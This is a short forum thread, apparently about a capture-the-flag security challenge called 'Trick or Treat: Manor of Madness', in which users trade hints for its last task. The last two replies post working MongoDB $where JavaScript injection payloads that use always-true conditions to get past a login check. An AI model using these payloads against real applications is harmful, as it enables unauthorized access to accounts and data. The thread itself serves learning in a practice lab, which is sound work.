Forum Discussion

immervivesolver

Bronze III

4 months ago

Solved

Trick or Treat: Manor of Madness

Any hints or close payloads for last task

application security

Samh051
4 months ago
This should nudge you in the right direction - MongoDB $where operator JavaScript injection - Web Application Vulnerabilities | Invicti

PRABAKARANRAMAMURTHY

Icon for Advocate rank

Advocate

3 months ago

This query worked for you in the last question?

immervivesolver

Bronze III

3 months ago

{“$where":"this.name == ‘admin’||’1’==‘1’&& this.incantation == ‘admin’||’1’==‘1’“}
PRABAKARANRAMAMURTHY

PRABAKARANRAMAMURTHY
Advocate
3 months ago
Thank you immervivesolver.
This worked:
{"$where":"this.name=='admin'||'1==1' && this.incantation =='admin'||'1==1'"}

Featured Places

Help